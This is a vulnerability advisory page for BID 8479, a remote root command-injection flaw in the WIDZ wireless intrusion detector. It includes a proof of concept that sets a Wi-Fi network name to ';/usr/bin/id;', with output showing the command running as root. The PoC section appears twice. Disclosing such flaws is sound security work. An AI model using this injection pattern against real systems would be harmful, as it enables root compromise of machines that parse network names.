WIDZ Remote Root Compromise Vulnerability
BID:8479
Info
WIDZ Remote Root Compromise Vulnerability
| Bugtraq ID: | 8479 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 23 2003 12:00AM |
| Updated: | Aug 23 2003 12:00AM |
| Credit: | Discovery is credited to KF <[email protected]>. |
| Vulnerable: |
WIDZ WIDZ 1.5 WIDZ WIDZ 1.0 |
| Not Vulnerable: | |
Exploit / POC
WIDZ Remote Root Compromise Vulnerability
The following proof of concept was provided:
Go to Apple Airport and set network name to ';/usr/bin/id;
This will generate the following message:
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file
The following proof of concept was provided:
Go to Apple Airport and set network name to ';/usr/bin/id;
This will generate the following message:
unknown AP essid=
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
sh: -c: line 3: unexpected EOF while looking for matching `''
sh: -c: line 4: syntax error: unexpected end of file